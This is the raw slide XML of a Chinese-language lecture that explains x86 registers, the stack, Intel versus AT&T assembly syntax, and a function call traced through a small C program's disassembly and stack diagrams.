            </a:pPr>
            <a:r>
              <a:t>    資料暫存器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="266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tack"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="2613830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269" name="程式運作時用來存放資料的空間"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12681505" y="927551"/>
            <a:ext cx="8999489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60947" indent="-360947">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>程式運作時用來存放資料的空間</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15363741" y="11433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1" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15363741" y="10595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2" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15363741" y="97447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3" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15363741" y="89192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4" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15363741" y="8081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5" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15363741" y="72301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6" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15363741" y="63902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7" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15363741" y="5552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8" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15363741" y="47248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9" name="stack"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16595630" y="37859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280" name="Low"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19156519" y="43802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281" name="High"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19105731" y="118732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282" name="…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16900579" y="115354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83" name="rutern address"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15655222" y="10697289"/>
            <a:ext cx="305205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rutern address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284" name="prev ebp point"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15680337" y="9846389"/>
            <a:ext cx="300182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prev ebp point</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285" name="ebp"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13136731" y="9358630"/>
            <a:ext cx="99398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ebp </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="286" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="14123410" y="9740899"/>
            <a:ext cx="1044437" cy="2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Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="15360649" y="6381292"/>
            <a:ext cx="508002" cy="508001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Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="15406384" y="6423720"/>
            <a:ext cx="2923897" cy="2923897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Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="16969563" y="7750977"/>
            <a:ext cx="1998533" cy="1998532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0" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="17722849" y="8504908"/>
            <a:ext cx="1270001" cy="1270001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 flipV="1">
            <a:off x="15335249" y="6423720"/>
            <a:ext cx="1270001" cy="1270001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Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="15343963" y="6423720"/>
            <a:ext cx="1998533" cy="1998532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 flipV="1">
            <a:off x="15990584" y="6799777"/>
            <a:ext cx="2980212" cy="2980212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 flipV="1">
            <a:off x="18459449" y="9233750"/>
            <a:ext cx="508002" cy="508002"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="1016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DATA"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15977249" y="7387650"/>
            <a:ext cx="2408000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4D4E4D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296" name="esp"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13136731" y="5980430"/>
            <a:ext cx="96831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esp </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14093178" y="6388100"/>
            <a:ext cx="1104901" cy="0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…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16900579" y="48264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99" name="…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16900579" y="56680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300" name="ESP…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2770921" y="5552500"/>
            <a:ext cx="8096807" cy="485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>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>ESP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>    存放當前stack頂指標</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="360947" indent="-360947">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>EBP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>    存放當前stack底指標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DATA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>    程式分配給函數使用的空間</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="301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X86 Assembly"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="6275895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X86 Assembly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304" name="組合語言…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12681505" y="927551"/>
            <a:ext cx="7949655" cy="264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組合語言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最接近機器語言的低階語言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依照CPU有不同的指令集</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="305" name="Table"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5939035" y="5511800"/>
          <a:ext cx="12505930" cy="694928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577896"/>
                <a:gridCol w="3607864"/>
                <a:gridCol w="5307468"/>
              </a:tblGrid>
              <a:tr h="804671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intel格式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at&amp;t格式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說明</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="t" anchorCtr="0" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="69934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mov eax, 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mov $1,%eax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eax = 1</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="t" anchorCtr="0" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="691399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mov ptr[0xff],2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mov $2,(0xff)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*0xff = 2</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="t" anchorCtr="0" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="68087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mov ptr[eax],3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mov $3,(%eax)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*eax = 3</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="t" anchorCtr="0" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="68087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pop eax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pop %eax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eax = *esp; esp += 4</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="t" anchorCtr="0" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="68087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push 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push $5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*esp = 5 ; esp -= 4</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="t" anchorCtr="0" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="68087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call 0x6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call *0x6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push next eip ; eip = 0x6</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="t" anchorCtr="0" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="68087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leave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leave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mov esp,ebp ; pop ebp</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="t" anchorCtr="0" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="68087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ret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ret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pop eip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06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X86 Function Call"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="7792602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X86 Function Call</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="309" name="#include &lt;stdio.h&gt;…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3365386" y="4544139"/>
            <a:ext cx="7402293" cy="791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4800">
                <a:solidFill>
                  <a:srgbClr val="669900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90055"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="0077AA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="990055"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>&lt;stdio.h&gt;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr sz="4800"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sz="4800">
                <a:solidFill>
                  <a:srgbClr val="0077AA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DD4A68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(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a</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,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b</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>){</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr sz="4800"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int</a:t>
            </a:r>
            <a:r>
              <a:t> tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="9A6E3A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="9A6E3A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr sz="4800"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char</a:t>
            </a:r>
            <a:r>
              <a:t> buf</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="990055"/>
                </a:solidFill>
              </a:rPr>
              <a:t>64</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:srgbClr val="0077AA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tmp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defTabSz="457200">
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:srgbClr val="9999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defTabSz="457200">
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:srgbClr val="DD4A68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77AA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t>main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0077AA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>){</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr sz="4800"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D4A68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>f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990055"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="990055"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:srgbClr val="0077AA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0055"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0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defTabSz="457200">
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:srgbClr val="9999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10" name="理解呼叫一個函數的過程…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12681505" y="927551"/>
            <a:ext cx="7340055" cy="17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理解呼叫一個函數的過程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Stack及Register的變化</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="311" name="080483db &lt;f&gt;:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2794000" y="3937000"/>
            <a:ext cx="11101609" cy="954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080483db &lt;f&gt;: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80483de:	83 ec 50             	sub    $0x50,%esp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80483e1:	8b 55 08             	mov    0x8(%ebp),%edx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80483ef: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80483f0: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080483f1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80483f4:	6a 02                	push   $0x2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80483f6:	6a 01                	push   $0x1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80483f8:	e8 de ff ff ff       	call   80483db &lt;f&gt;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2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>80483fd:	83 c4 08             	add    $0x8,%esp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8048406:	c3                   	ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="312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15041731" y="3709710"/>
            <a:ext cx="6937237" cy="8724861"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6937236" cy="8724859"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="313" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="215080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4" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150809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5" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150809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6" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150809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7" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150809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8" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150809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9" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150809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0" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150809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1" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150809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2" name="stack"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3382698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323" name="Low"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5892787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324" name="High"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5892800" y="8087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325" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3687647" y="77495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326" name="ebp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="5572719"/>
              <a:ext cx="99398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 </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="327" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="947568" y="59549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esp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="21945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329" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="947568" y="26021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…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3687647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331" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3687647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332" name="rutern address"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2429591" y="6911378"/>
              <a:ext cx="305205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rutern address</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="333" name="prev ebp point"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2467405" y="6073178"/>
              <a:ext cx="300182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prev ebp point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1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="311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X86 Function Call"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="7792602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X86 Function Call</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="337" name="Table"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="15367000" y="1524000"/>
          <a:ext cx="7267638" cy="1714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0xf8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0xf8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0x80483f4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38" name="080483db &lt;f&gt;:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2794000" y="3937000"/>
            <a:ext cx="11101609" cy="954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080483db &lt;f&gt;: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80483de:	83 ec 50             	sub    $0x50,%esp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80483e1:	8b 55 08             	mov    0x8(%ebp),%edx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80483ef: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80483f0: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080483f1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80483f4:	6a 02                	push   $0x2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80483f6:	6a 01                	push   $0x1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80483f8:	e8 de ff ff ff       	call   80483db &lt;f&gt;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2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>80483fd:	83 c4 08             	add    $0x8,%esp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8048406:	c3                   	ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="339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pSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="361" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="14201996" y="3709710"/>
            <a:ext cx="7776972" cy="9613861"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="7776970" cy="9613859"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="340" name="rutern address"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3269326" y="6911378"/>
              <a:ext cx="305205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rutern address</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="341" name="prev ebp point"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3307140" y="6073178"/>
              <a:ext cx="300182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prev ebp point</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="342" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2990544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3" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2990544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4" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2990544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5" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2990544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6" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2990544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7" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2990544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Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2990544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9" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2990544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0" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2990544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1" name="stack"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4222433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352" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4527382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353" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4527382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354" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2990544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5" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2990544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6" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1787303" y="92950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ebp/esp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="8976319"/>
              <a:ext cx="173113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ebp/esp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="358" name="Low"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6732522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359" name="High"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6732534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360" name="0xf0"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6732522" y="72999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X86 Function Call"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="7792602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X86 Function Call</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="364" name="Table"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="15367000" y="1524000"/>
          <a:ext cx="7267638" cy="1714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0xf8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0xf4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0x80483f6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65" name="080483db &lt;f&gt;:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2794000" y="3937000"/>
            <a:ext cx="11101609" cy="954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080483db &lt;f&gt;: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80483de:	83 ec 50             	sub    $0x50,%esp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80483e1:	8b 55 08             	mov    0x8(%ebp),%edx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80483ef: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80483f0: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080483f1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80483f4:	6a 02                	push   $0x2</a:t>
            </a:r>
